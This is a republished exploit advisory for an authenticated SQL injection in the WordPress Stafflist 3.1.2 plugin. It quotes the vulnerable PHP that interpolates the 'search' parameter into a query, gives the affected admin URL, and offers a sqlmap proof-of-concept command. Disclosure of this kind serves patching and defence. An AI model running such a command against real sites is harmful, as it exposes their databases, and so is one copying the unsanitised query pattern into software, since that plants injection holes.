Home Tools Exploits & CVE's WordPress Stafflist 3.1.2 SQL Injection

WordPress Stafflist 3.1.2 SQL Injection

May 2, 2022

519

WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection
(Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
      LOWER(firstname) LIKE '%{$w}%' OR
      LOWER(department)  LIKE '%{$w}%' OR
      LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib

WordPress Stafflist 3.1.2 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Armenian Officials Trained on Essential Techniques and Tools for Effective Crypto-Crime...

Kaiser’s website tracking tools may have compromised data on 13 million...

British intelligence moves to protect research universities from espionage

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

WordPress WP Google Maps 8.1.11 Cross Site Scripting

VestaCP 0.9.8-26 Token Session

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction